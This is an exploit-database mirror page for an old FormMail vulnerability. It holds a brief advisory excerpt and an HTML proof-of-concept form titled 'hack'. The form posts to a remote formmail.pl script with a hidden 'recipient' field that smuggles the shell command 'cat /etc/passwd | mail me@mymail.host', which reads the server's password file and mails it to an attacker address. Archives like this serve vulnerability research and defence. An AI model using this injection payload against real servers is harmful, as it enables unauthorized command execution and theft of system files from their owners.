bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/unix/remote/20486.html
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

11 lines
No EOL
743 B
HTML
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/2080/info
FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user.
A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, "Matt Wright FormMail Remote Command Execution Vulnerability".
<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
<input type="submit" name="submit" value="submit">
</form></body></html>
Reference in a new issue View git blame Copy permalink